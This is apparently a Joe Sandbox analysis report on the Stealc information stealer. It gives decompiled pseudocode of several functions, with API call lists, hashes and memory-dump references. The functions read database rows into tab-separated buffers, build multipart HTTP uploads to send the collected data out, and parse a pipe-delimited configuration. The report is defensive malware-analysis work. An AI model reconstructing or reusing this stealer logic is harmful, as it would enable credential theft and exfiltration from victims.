0x0017581c
0x00175824
0x0017582c
0x00175834
0x0017583c
0x00175844
0x0017584c
0x00175852
0x00175853
0x00175667
0x0017585f
0x00175865
0x00175868
0x00175873
0x00175874
0x0017587a
0x0017587f
0x00175884
0x0017588c
0x00175894
0x00175895
0x0017589d
0x001758a0
0x001758a0
0x001758ad
0x001758b3
0x001758b9
0x001758c3
0x001758c9
0x001758cd
0x001758d6
0x001758de
0x001758e5
0x001758ec
0x001758ec
0x00000000
0x00000000
0x00000000
0x00175497
0x001758f4
0x001758fc
0x00175904
0x00175915

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0017563A
RtlAllocateHeap.NTDLL(00000000), ref: 00175641
lstrcat.KERNEL32(0017657D,?), ref: 0017574A
lstrcat.KERNEL32(0017657D,00181EC8), ref: 00175754
lstrcat.KERNEL32(0017657D,?), ref: 00175760
lstrcat.KERNEL32(0017657D,00181EC8), ref: 0017576A
lstrcat.KERNEL32(0017657D,?), ref: 00175776
lstrcat.KERNEL32(0017657D,00181EC8), ref: 00175780
lstrcat.KERNEL32(0017657D,?), ref: 0017578C
lstrcat.KERNEL32(0017657D,00181EC8), ref: 00175796
lstrcat.KERNEL32(0017657D,?), ref: 001757A2
lstrcat.KERNEL32(0017657D,00181EC8), ref: 001757AC
lstrcat.KERNEL32(0017657D,?), ref: 001757B8
lstrcat.KERNEL32(0017657D,00181EC8), ref: 001757C2

Part of subcall function 00174E50: memcmp.MSVCRT ref: 00174E6E
Part of subcall function 00174E50: memset.MSVCRT ref: 00174EA0

lstrcat.KERNEL32(0017657D,00000000), ref: 001757FD
lstrcat.KERNEL32(0017657D,00181EBC), ref: 00175813
lstrlen.KERNEL32(0017657D), ref: 0017585F
lstrlen.KERNEL32(0017657D), ref: 0017586D
memset.MSVCRT ref: 001758AD

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlenmemset$AllocateProcessmemcmp
String ID:
API String ID: 3277701846-0
Opcode ID: eb50416356d0b4afec066348462f7542d2b2601c9a1181ea8069d0425f380ce9
Instruction ID: ccb09b0300ca654c420639a5c0753667688dab86abd8220f29f1f4c4d6cb185b
Opcode Fuzzy Hash: eb50416356d0b4afec066348462f7542d2b2601c9a1181ea8069d0425f380ce9
Instruction Fuzzy Hash: ACD1E472D00219EBCF02AFA4ED4A99D7BB9FF18704F5480A0F609B7171DB31AE169B51

Uniqueness

Uniqueness Score: -1.00%

Function 00176CE3 Relevance: 28.8, APIs: 19, Instructions: 309
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E00176CE3(void* __ecx, void* __eflags, intOrPtr _a4, char _a16, char _a28, char _a40) {
				void _v8;
				char _v12;
				char _v16;
				char _v28;
				char _v40;
				char _v52;
				char _v64;
				char _v76;
				char _v88;
				char _v100;
				char _v112;
				char _v124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t115;
				void* _t154;
				long _t172;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t201;
				void* _t203;
				void* _t205;
				void* _t235;
				char* _t238;
				void* _t239;
				void* _t240;
				void* _t245;
				void* _t259;
				char* _t265;
				char* _t292;
				char* _t293;
				void* _t294;
				void* _t295;
				void* _t297;
				void* _t298;

				_t299 = __eflags;
				_t239 = __ecx;
				E0017E990( &_v40, __eflags, 0x17fbd9);
				E0017EA2F(E0017EAAB( &_v40, _t239,  &_v124, __eflags,  *0x3833c8), _t239,  &_v40);
				E00171839(_v124);
				_t115 = E0017D78F(0x17fbd9,  &_v112, _t299, 0x1a);
				_pop(_t240);
				E0017EA2F(E0017EA69( &_v40, _t240, _t115,  &_v124, _t299), _t240,  &_v40);
				E00171839(_v124);
				E00171839(_v112);
				 *0x383610(_a4, _v40, 1);
				E0017E990( &_v28, _t299, 0x17fbd9);
				E0017EA2F(E0017EAAB( &_v28, _t240,  &_v124, _t299,  *0x3831b4), _t240,  &_v28);
				E00171839(_v124);
				E0017EA2F(E0017EAAB( &_v28, _t240,  &_v124, _t299, 0x17fbdc), _t240,  &_v28);
				E00171839(_v124);
				E0017EA2F(E0017EA69( &_v28, _t240,  &_a28,  &_v124, _t299), _t240,  &_v28);
				E00171839(_v124);
				E0017EA2F(E0017EAAB( &_v28, _t240,  &_v124, _t299, "_"), _t240,  &_v28);
				E00171839(_v124);
				E0017EA2F(E0017EAAB(E0017EA69( &_v28, _t240,  &_a16,  &_v112, _t299), _t240,  &_v124, _t299,  *0x383238), _t240,  &_v28);
				E00171839(_v124);
				E00171839(_v112);
				_t154 =  *0x38359c(_a4,  &_v16);
				if(_t154 == 0) {
					_t172 =  *0x383558(_v16,  *0x383140, 0xffffffff,  &_v12, _t154);
					_t295 = _t294 + 0x14;
					if(_t172 == 0) {
						_t176 = RtlAllocateHeap(GetProcessHeap(), _t172, 0x5f5e0ff);
						_v8 = _t176;
						_t177 =  *0x383574(_v12);
						_pop(_t245);
						_t302 = _t177 - 0x64;
						if(_t177 == 0x64) {
							_t238 = "0";
							_t265 = "\t";
							do {
								E0017E990( &_v124, _t302,  *0x383590(_v12, 0));
								E0017E990( &_v64, _t302,  *0x383590(_v12, 1));
								E0017E990( &_v112, _t302,  *0x383590(_v12, 2));
								E0017E990( &_v52, _t302,  *0x383590(_v12, 3));
								E0017E990( &_v100, _t302,  *0x383590(_v12, 4));
								E0017E990( &_v88, _t302,  *0x383590(_v12, 5));
								_t201 =  *0x383590(_v12, 6);
								_pop(_t259);
								E0017E990( &_v76, _t302, _t201);
								_t203 =  *0x383754(_v64, _t238);
								_t292 =  &_v64;
								if(_t203 != 0) {
									_push( *0x383048);
								} else {
									_push( *0x38331c);
								}
								E0017E9EB(_t259, _t292);
								_t205 =  *0x383754(_v52);
								_t293 =  &_v52;
								if(_t205 != 0) {
									_push( *0x383048);
								} else {
									_push( *0x38331c);
								}
								E0017E9EB(_t259, _t293);
								 *0x383730(_v8, _v124);
								 *0x383730(_v8, _t265);
								 *0x383730(_v8, _v64);
								 *0x383730(_v8, _t265);
								 *0x383730(_v8, _v112);
								 *0x383730(_v8, _t265);
								 *0x383730(_v8, _v52);
								 *0x383730(_v8, _t265);
								 *0x383730(_v8, _v100);
								 *0x383730(_v8, _t265);
								 *0x383730(_v8, _v88);
								 *0x383730(_v8, _t265);
								 *0x383730(_v8, _v76);
								 *0x383730(_v8, "\n");
								E00171839(_v76);
								E00171839(_v88);
								E00171839(_v100);
								E00171839(_v52);
								E00171839(_v112);
								E00171839(_v64);
								E00171839(_v124);
								_t235 =  *0x383574(_v12);
								_pop(_t245);
							} while (_t235 == 0x64);
						}
						_t178 =  *0x383658(_v8);
						_t306 = _t178 - 5;
						if(_t178 > 5) {
							_push( *0x383658(_v8));
							_push(_v8);
							_t297 = _t295 - 0xc;
							E0017E9C2( &_v28, _t245, _t297, _t306);
							_t298 = _t297 - 0x50;
							E001716CB( &_a40, _t298);
							_push( &_v124);
							E00173786(_t245, _t306);
							_t295 = _t298 + 0x68;
							E00171839(_v124);
						}
						memset( &_v8, 0, 4);
					}
					 *0x383578(_v12);
					 *0x3835a0(_v16);
				}
				 *0x383664(_v40);
				E00171839(_v40);
				E00171839(_v28);
				E00171839(0);
				E00171839(0);
				E00171839(_a4);
				E00171839(_a16);
				E00171839(_a28);
				return E001716AC( &_a40);
			}

0x00176ce3
0x00176ce3
0x00176cf5
0x00176d0e
0x00176d16
0x00176d20
0x00176d27
0x00176d36
0x00176d3e
0x00176d46
0x00176d53
0x00176d5d
0x00176d76
0x00176d7e
0x00176d96
0x00176d9e
0x00176db4
0x00176dbc
0x00176dd4
0x00176ddc
0x00176e00
0x00176e08
0x00176e10
0x00176e1c
0x00176e26
0x00176e3c
0x00176e42
0x00176e47
0x00176e5a
0x00176e63
0x00176e66
0x00176e6c
0x00176e6d
0x00176e70
0x00176e76
0x00176e7b
0x00176e80
0x00176e91
0x00176ea7
0x00176ebd
0x00176ed3
0x00176ee9
0x00176eff
0x00176f09
0x00176f10
0x00176f15
0x00176f1e
0x00176f24
0x00176f29
0x00176f33
0x00176f2b
0x00176f2b
0x00176f2b
0x00176f39
0x00176f42
0x00176f48
0x00176f4d
0x00176f57
0x00176f4f
0x00176f4f
0x00176f4f
0x00176f5d
0x00176f68
0x00176f72
0x00176f7e
0x00176f88
0x00176f94
0x00176f9e
0x00176faa
0x00176fb4
0x00176fc0
0x00176fca
0x00176fd6
0x00176fe0
0x00176fec
0x00176ffa
0x00177003
0x0017700b
0x00177013
0x0017701b
0x00177023
0x0017702b
0x00177033
0x0017703b
0x00177041
0x00177042
0x00176e80
0x0017704e
0x00177054
0x00177057
0x00177062
0x00177063
0x00177069
0x0017706e
0x00177073
0x0017707b
0x00177083
0x00177084
0x0017708c
0x0017708f
0x0017708f
0x0017709c
0x001770a2
0x001770a8
0x001770b1
0x001770b8
0x001770bc
0x001770c5
0x001770cd
0x001770d4
0x001770db
0x001770e3
0x001770eb
0x001770f3
0x00177104

APIs

Part of subcall function 0017E990: lstrcpy.KERNEL32(00000000,00000000), ref: 0017E9B6

Part of subcall function 0017EAAB: lstrlen.KERNEL32(?,?,?,0017D009,00181EC0,00000000,00181EC0,00000000,0017FBD9), ref: 0017EABF
Part of subcall function 0017EAAB: lstrcpy.KERNEL32(00000000,?), ref: 0017EAE7
Part of subcall function 0017EAAB: lstrcat.KERNEL32(?,00000000), ref: 0017EAF2

Part of subcall function 0017EA2F: lstrcpy.KERNEL32(00000000,?), ref: 0017EA5F

Part of subcall function 0017D78F: GetSystemTime.KERNEL32(?,0017FBD9,00000000,?,?,?,?,?,?,?,00173219,00000014), ref: 0017D7B4

Part of subcall function 0017EA69: lstrcpy.KERNEL32(00000000,?), ref: 0017EA97
Part of subcall function 0017EA69: lstrcat.KERNEL32(?,00000000), ref: 0017EAA1

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00176E53
RtlAllocateHeap.NTDLL(00000000), ref: 00176E5A
lstrcat.KERNEL32(00177782,?), ref: 00176F68
lstrcat.KERNEL32(00177782,00181EC8), ref: 00176F72
lstrcat.KERNEL32(00177782,?), ref: 00176F7E
lstrcat.KERNEL32(00177782,00181EC8), ref: 00176F88
lstrcat.KERNEL32(00177782,?), ref: 00176F94
lstrcat.KERNEL32(00177782,00181EC8), ref: 00176F9E
lstrcat.KERNEL32(00177782,?), ref: 00176FAA
lstrcat.KERNEL32(00177782,00181EC8), ref: 00176FB4
lstrcat.KERNEL32(00177782,?), ref: 00176FC0
lstrcat.KERNEL32(00177782,00181EC8), ref: 00176FCA
lstrcat.KERNEL32(00177782,?), ref: 00176FD6
lstrcat.KERNEL32(00177782,00181EC8), ref: 00176FE0
lstrcat.KERNEL32(00177782,?), ref: 00176FEC
lstrcat.KERNEL32(00177782,00181EBC), ref: 00176FFA
lstrlen.KERNEL32(00177782), ref: 0017704E
lstrlen.KERNEL32(00177782), ref: 0017705C
memset.MSVCRT ref: 0017709C

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$Heap$AllocateProcessSystemTimememset
String ID:
API String ID: 245975372-0
Opcode ID: b6b4a327c3b4355e6dfad95de05525ab6e216c96594a082bccced9743657e823
Instruction ID: 5dd4dd52589b6105bca513bdcae45158dbe35cfa217af049daa38d2b00ba08e1
Opcode Fuzzy Hash: b6b4a327c3b4355e6dfad95de05525ab6e216c96594a082bccced9743657e823
Instruction Fuzzy Hash: B9C1E372D04219EBDF02ABA4ED0A9DDBBB9FF18704F1480A5F609B3171DB316E569B40

Uniqueness

Uniqueness Score: -1.00%

Function 00173D9B Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 388
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00173D9B(void* __ecx, void* __eflags, intOrPtr* _a4, char _a8, char _a20, char _a88) {
				void* _v16;
				char _v28;
				signed int _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v56;
				int _v68;
				intOrPtr _v72;
				char _v84;
				char _v96;
				char _v108;
				intOrPtr _v124;
				intOrPtr _v144;
				intOrPtr _v152;
				intOrPtr _v164;
				void _v168;
				char _v368;
				char _v428;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t168;
				intOrPtr _t175;
				void* _t179;
				void* _t204;
				void* _t245;
				signed int _t250;
				void* _t327;
				void* _t330;
				void* _t337;
				signed int _t342;
				void* _t350;
				void* _t353;
				signed int _t354;
				signed int _t356;
				void* _t358;
				long _t441;
				void* _t444;
				void* _t445;
				void* _t446;
				void* _t448;

				_t452 = __eflags;
				_t446 = _t445 - 0xc;
				E0017E9C2( &_a8, __ecx, _t446, __eflags);
				_t168 = E001730F8();
				_t356 = 0xf;
				memcpy( &_v168, _t168, _t356 << 2);
				_t448 = _t446 + 0x1c;
				E0017E990(_a4, _t452, 0x17fbd9);
				E0017E990( &_v84, _t452, 0x17fbd9);
				E0017E990( &_v16, _t452, 0x17fbd9);
				E0017E990( &_v68, _t452, 0x17fbd9);
				E0017E990( &_v96, _t452, 0x17fbd9);
				_t175 =  *0x383694(0, 1, 0, 0, 0,  &_v428);
				_push( *0x3833a4);
				_v72 = _t175;
				_push(_v164);
				_v32 = 0;
				if( *0x383754() == 0) {
					_v32 = 1;
				}
				_t454 = _v72;
				if(_v72 != 0) {
					_t204 = E0017D78F(_t350,  &_v56, _t454, 0x14);
					_pop(0);
					E0017EA2F(E0017EA69( &_v84, 0, _t204,  &_v108, _t454), 0,  &_v84);
					E00171839(_v108);
					E00171839(_v56);
					_t352 = "\r\n";
					E0017EA2F(E0017EAAB( &_v68, 0,  &_v56, _t454, "\r\n"), 0,  &_v68);
					E00171839(_v56);
					E0017EA2F(E0017EAAB( &_v68, 0,  &_v56, _t454, "------"), 0,  &_v68);
					E00171839(_v56);
					E0017EA2F(E0017EA69( &_v68, 0,  &_v84,  &_v56, _t454), 0,  &_v68);
					E00171839(_v56);
					E0017EA2F(E0017EAAB( &_v68, 0,  &_v56, _t454, "--"), 0,  &_v68);
					E00171839(_v56);
					E0017EA2F(E0017EAAB( &_v68, 0,  &_v56, _t454, "\r\n"), 0,  &_v68);
					E00171839(_v56);
					E0017EA2F(E0017EA69(E0017EAAB( &_v96, 0,  &_v28, _t454,  *0x38306c), 0,  &_v84,  &_v108, _t454), 0,  &_v96);
					E00171839(_v108);
					E00171839(_v28);
					_t245 =  *0x383778(_v72, _v152, _v144, 0, 0, 3, 0, 0);
					_v36 = _t245;
					if(_t245 != 0) {
						asm("sbb eax, eax");
						_t250 =  *0x3837a8(_v36,  *0x3833c0, _v124,  *0x3831f8, 0, 0, ( ~_v32 & 0x00800000) + 0x400100, 0);
						_v32 = _t250;
						_t456 = _t250;
						if(_t250 != 0) {
							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t456, "------"), 0,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EA69( &_v16, 0,  &_v84,  &_v28, _t456), 0,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t456, _t352), 0,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EAAB( &_v16, 0,  &_v56, _t456,  *0x38322c), 0,  &_v16);
							E00171839(_v56);
							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t456,  *0x383398), 0,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t456, "\"\r\n\r\n"), 0,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EA69( &_v16, 0,  &_a20,  &_v28, _t456), 0,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t456, _t352), 0,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t456, "------"), 0,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EA69( &_v16, 0,  &_v84,  &_v28, _t456), 0,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t456, _t352), 0,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EAAB( &_v16, 0,  &_v56, _t456,  *0x38322c), 0,  &_v16);
							E00171839(_v56);
							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t456,  *0x383050), 0,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t456, "\"\r\n\r\n"), 0,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EA69( &_v16, 0,  &_a88,  &_v28, _t456), 0,  &_v16);
							E00171839(_v28);
							_t327 =  *0x383658(_v68);
							_t441 = _t327 +  *0x383658(_v16);
							_t330 = RtlAllocateHeap(GetProcessHeap(), 0, _t441);
							_t353 = _t330;
							memcpy(_t353, _v16,  *0x383658(_v16));
							memcpy(_t353 +  *0x383658( *0x383658(_v68)), _v16, _v68);
							_t448 = _t448 + 0x18;
							_t337 =  *0x383658(_v96, _t353, _t441);
							_t354 = _v32;
							 *0x383748(_t354, _v96, _t337);
							while(1) {
								_push( &_v32);
								_push(0xc7);
								_push( &_v368);
								_push(_t354);
								if( *0x3836b8() == 0) {
									break;
								}
								_t342 = _v32;
								__eflags = _t342;
								if(__eflags != 0) {
									 *((char*)(_t444 + _t342 - 0x16c)) = 0;
									E0017EA2F(E0017EAAB(_a4, 0,  &_v108, __eflags,  &_v368), 0, _a4);
									E00171839(_v108);
									continue;
								}
								break;
							}
							 *0x383690(_t354);
						}
						 *0x383690(_v36);
					}
				}
				 *0x383690(_v72);
				_t179 = E00174C21( &_v40, 0,  &_v44,  *_a4);
				_pop(_t358);
				_t458 = _t179;
				if(_t179 != 0) {
					E0017E9EB(_t358, _a4, 0x17fbd9);
					E0017EA2F(E0017EAAB(_a4, _t358,  &_v28, _t458, _v40), _t358, _a4);
					E00171839(_v28);
				}
				_v36 =  &_v40;
				memset(_v36, 0, 4 << 0);
				_v36 =  &_v44;
				memset(_v36, 0, 4 << 0);
				E00171839(_v96);
				E00171839(_v68);
				E00171839(_v16);
				E00171839(_v84);
				E001716AC( &_a8);
				E00171839(_a88);
				return _a4;
			}

0x00173d9b
0x00173da7
0x00173daf
0x00173dbb
0x00173dc5
0x00173dce
0x00173dce
0x00173dd9
0x00173de2
0x00173deb
0x00173df4
0x00173dfd
0x00173e0c
0x00173e12
0x00173e18
0x00173e1b
0x00173e21
0x00173e2c
0x00173e2e
0x00173e2e
0x00173e31
0x00173e34
0x00173e3f
0x00173e46
0x00173e55
0x00173e5d
0x00173e65
0x00173e6a
0x00173e7e
0x00173e86
0x00173e9e
0x00173ea6
0x00173ebc
0x00173ec4
0x00173edc
0x00173ee4
0x00173ef8
0x00173f00
0x00173f21
0x00173f29
0x00173f31
0x00173f4d
0x00173f53
0x00173f58
0x00173f64
0x00173f85
0x00173f8b
0x00173f8e
0x00173f90
0x00173fa9
0x00173fb1
0x00173fc4
0x00173fcc
0x00173fe0
0x00173fe8
0x00174001
0x00174009
0x00174022
0x0017402a
0x00174042
0x0017404a
0x00174060
0x00174068
0x0017407c
0x00174084
0x0017409c
0x001740a4
0x001740ba
0x001740c2
0x001740d6
0x001740de
0x001740f7
0x001740ff
0x00174118
0x00174120
0x00174138
0x00174140
0x00174156
0x0017415e
0x00174166
0x00174177
0x00174183
0x0017418c
0x0017419f
0x001741bd
0x001741bf
0x001741c7
0x001741cd
0x001741d5
0x00174213
0x00174216
0x00174217
0x0017421e
0x0017421f
0x00174228
0x00000000
0x00000000
0x001741e2
0x001741e5
0x001741e7
0x001741e9
0x00174206
0x0017420e
0x00000000
0x0017420e
0x00000000
0x001741e7
0x0017422b
0x0017422b
0x00174234
0x00174234
0x00173f58
0x0017423d
0x0017424e
0x00174253
0x00174254
0x00174256
0x00174260
0x00174276
0x0017427e
0x0017427e
0x00174286
0x00174293
0x00174298
0x001742a5
0x001742aa
0x001742b2
0x001742ba
0x001742c2
0x001742ca
0x001742d2
0x001742de

APIs

Part of subcall function 0017E9C2: lstrcpy.KERNEL32(00000000,?), ref: 0017E9E1

Part of subcall function 001730F8: malloc.MSVCRT ref: 0017312A
Part of subcall function 001730F8: malloc.MSVCRT ref: 00173130
Part of subcall function 001730F8: malloc.MSVCRT ref: 00173136
Part of subcall function 001730F8: lstrlen.KERNEL32(000000FF,00000000,?), ref: 00173148

Part of subcall function 0017E990: lstrcpy.KERNEL32(00000000,00000000), ref: 0017E9B6

Part of subcall function 0017EAAB: lstrlen.KERNEL32(?,?,?,0017D009,00181EC0,00000000,00181EC0,00000000,0017FBD9), ref: 0017EABF
Part of subcall function 0017EAAB: lstrcpy.KERNEL32(00000000,?), ref: 0017EAE7
Part of subcall function 0017EAAB: lstrcat.KERNEL32(?,00000000), ref: 0017EAF2

Part of subcall function 0017EA2F: lstrcpy.KERNEL32(00000000,?), ref: 0017EA5F

Part of subcall function 0017EA69: lstrcpy.KERNEL32(00000000,?), ref: 0017EA97
Part of subcall function 0017EA69: lstrcat.KERNEL32(?,00000000), ref: 0017EAA1

lstrlen.KERNEL32(?,",00181E44,------,00181E44,",00181E44,------), ref: 00174166
lstrlen.KERNEL32(?), ref: 00174171
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0017417C
RtlAllocateHeap.NTDLL(00000000), ref: 00174183
lstrlen.KERNEL32(?), ref: 0017418E
memcpy.MSVCRT ref: 0017419F
lstrlen.KERNEL32(?), ref: 001741A7
lstrlen.KERNEL32(?,?,00000000), ref: 001741B4
memcpy.MSVCRT ref: 001741BD
lstrlen.KERNEL32(?,00000000,00000000), ref: 001741C7

Strings

------, xrefs: 00173E8B, 00173F96, 00174089
", xrefs: 0017402F, 00174125

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$malloc$Heaplstrcatmemcpy$AllocateProcess
String ID: "$------
API String ID: 2463768155-2370822465
Opcode ID: 74b0ca48f641d40bb88c5f19df68356e041ff15b36b7fd01d178647d379ebc11
Instruction ID: 072b4c20721a5df0bb13cd7d1962343d9376159efe37d7ae6078fcc1e33f2a99
Opcode Fuzzy Hash: 74b0ca48f641d40bb88c5f19df68356e041ff15b36b7fd01d178647d379ebc11
Instruction Fuzzy Hash: 01F19736D0012AABCF01EFA4EC469DDBBB9BF58704F5580A0F919B7161D7306E5ACB90

Uniqueness

Uniqueness Score: -1.00%

Function 00178E1F Relevance: 16.7, APIs: 11, Instructions: 248
stringCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E00178E1F(void* __ebx, void* __esi, intOrPtr _a4, signed int _a16) {
				char _v8;
				char _v12;
				void* _v16;
				signed int _v20;
				char _v32;
				char _v44;
				char _v56;
				char _v68;
				char _v80;
				char _v92;
				char _v104;
				char _v116;
				char _v376;
				char _v636;
				short _t89;
				intOrPtr* _t91;
				void* _t101;
				char* _t104;
				void* _t105;
				void* _t173;
				void* _t181;
				void* _t184;
				intOrPtr _t185;
				void* _t189;
				signed int _t195;
				void* _t197;
				signed int _t206;
				intOrPtr* _t209;
				intOrPtr _t225;
				intOrPtr _t226;
				void* _t227;
				void* _t230;

				_t197 = __ebx;
				_t89 = 0x7c;
				_v8 = _t89;
				_t91 =  &_v8;
				_v20 = 1;
				__imp__strtok_s(_a4, _t91,  &_v12);
				_t209 = _t91;
				_v16 =  &_v636;
				memset(_v16, 0, 0x104 << 0);
				_v16 =  &_v376;
				memset(_v16, 0, 0x104 << 0);
				_t230 = _t227 + 0x24;
				_t201 = 0;
				if(_t209 == 0) {
					L25:
					return E00171839(_a4);
				} else {
					do {
						_t101 = _v20 - 1;
						if(_t101 == 0) {
							_t223 =  *(_t197 + 0xc) * 0x30 + _a16;
							L21:
							_push(_t209);
							L22:
							E0017E9EB(_t201, _t223);
							goto L23;
						}
						_t105 = _t101 - 1;
						if(_t105 == 0) {
							_v16 =  &_v636;
							memset(_v16, 0, 0x104 << 0);
							_v16 =  &_v376;
							memset(_v16, 0, 0x104 << 0);
							 *0x3837b8( &_v636, _t209);
							 *0x3837b8( &_v376, E0017DBC6( &_v636,  *0x383338,  *((intOrPtr*)(E0017D8C9( &_v104, 0x10)))));
							E00171839(_v104);
							 *0x3837b8( &_v376, E0017DBC6( &_v376,  *0x3833b8,  *((intOrPtr*)(E0017D8C9( &_v56, 0x1a)))));
							E00171839(_v56);
							 *0x3837b8( &_v376, E0017DBC6( &_v376,  *0x383384,  *((intOrPtr*)(E0017D8C9( &_v32, 0x1c)))));
							E00171839(_v32);
							 *0x3837b8( &_v376, E0017DBC6( &_v376,  *0x383200,  *((intOrPtr*)(E0017D8C9( &_v80, 0x28)))));
							E00171839(_v80);
							 *0x3837b8( &_v376, E0017DBC6( &_v376,  *0x383210,  *((intOrPtr*)(E0017D8C9( &_v116, 5)))));
							E00171839(_v116);
							 *0x3837b8( &_v376, E0017DBC6( &_v376,  *0x383070,  *((intOrPtr*)(E0017D8C9( &_v44, 0x26)))));
							E00171839(_v44);
							 *0x3837b8( &_v376, E0017DBC6( &_v376,  *0x383450,  *((intOrPtr*)(E0017D8C9( &_v68, 0x2a)))));
							E00171839(_v68);
							_t173 = E0017DBC6( &_v376,  *0x383270,  *((intOrPtr*)(E0017D8C9( &_v92, 8))));
							_t230 = _t230 + 0x78;
							 *0x3837b8( &_v376, _t173);
							E00171839(_v92);
							_t201 = _a16;
							_push( &_v376);
							_t223 =  *(_t197 + 0xc) * 0x30 + _a16 + 0xc;
							goto L22;
						}
						_t181 = _t105 - 1;
						if(_t181 == 0) {
							_t201 = _a16;
							_t223 =  *(_t197 + 0xc) * 0x30 + _a16 + 0x18;
							goto L21;
						}
						_t184 = _t181 - 1;
						if(_t184 == 0) {
							_t206 = 0;
							while(1) {
								_t185 =  *_t209;
								if(_t185 == 0) {
									break;
								}
								_t206 = _t206 * 0xa + _t185 - 0x30;
								_t209 = _t209 + 1;
							}
							 *( *(_t197 + 0xc) * 0x30 + _a16 + 0x24) = _t206;
							goto L23;
						}
						_t189 = _t184 - 1;
						if(_t189 == 0) {
							_push("1");
							_push(_t209);
							_t225 = 0;
							if( *0x383754() == 0) {
								_t225 = 1;
							}
							_t201 = _a16;
							 *((intOrPtr*)( *(_t197 + 0xc) * 0x30 + _a16 + 0x28)) = _t225;
						} else {
							if(_t189 == 1) {
								_push("1");
								_push(_t209);
								_t226 = 0;
								if( *0x383754() == 0) {
									_t226 = 1;
								}
								_t195 =  *(_t197 + 0xc);
								_v20 = _v20 & 0x00000000;
								_t201 = _t195 * 0x30;
								 *((intOrPtr*)(_t195 * 0x30 + _a16 + 0x2c)) = _t226;
								 *(_t197 + 0xc) = _t195 + 1;
							}
						}
						L23:
						_t104 =  &_v8;
						__imp__strtok_s(0, _t104,  &_v12);
						_t230 = _t230 + 0xc;
						_v20 = _v20 + 1;
						_t209 = _t104;
					} while (_t209 != 0);
					goto L25;
				}
			}

0x00178e1f
0x00178e2b
0x00178e2c
0x00178e34
0x00178e3b
0x00178e42
0x00178e48
0x00178e53
0x00178e60
0x00178e68
0x00178e75
0x00178e75
0x00178e75
0x00178e79
0x00179160
0x0017916a
0x00178e7f
0x00178e80
0x00178e83
0x00178e84
0x00179136
0x00179139
0x00179139
0x0017913a
0x0017913a
0x00000000
0x0017913a
0x00178e8a
0x00178e8b
0x00178f38
0x00178f45
0x00178f4d
0x00178f5a
0x00178f64
0x00178f92
0x00178f9b
0x00178fc8
0x00178fd1
0x00178ffe
0x00179007
0x00179034
0x0017903d
0x0017906a
0x00179073
0x001790a0
0x001790a9
0x001790d6
0x001790df
0x001790fc
0x00179101
0x0017910c
0x00179115
0x0017911a
0x00179123
0x0017912a
0x00000000
0x0017912a
0x00178e91
0x00178e92
0x00178f23
0x00178f29
0x00000000
0x00178f29
0x00178e98
0x00178e99
0x00178ef9
0x00178f08
0x00178f08
0x00178f0c
0x00000000
0x00000000
0x00178f03
0x00178f07
0x00178f07
0x00178f17
0x00000000
0x00178f17
0x00178e9b
0x00178e9c
0x00178ed4
0x00178ed9
0x00178eda
0x00178ee4
0x00178ee6
0x00178ee6
0x00178eea
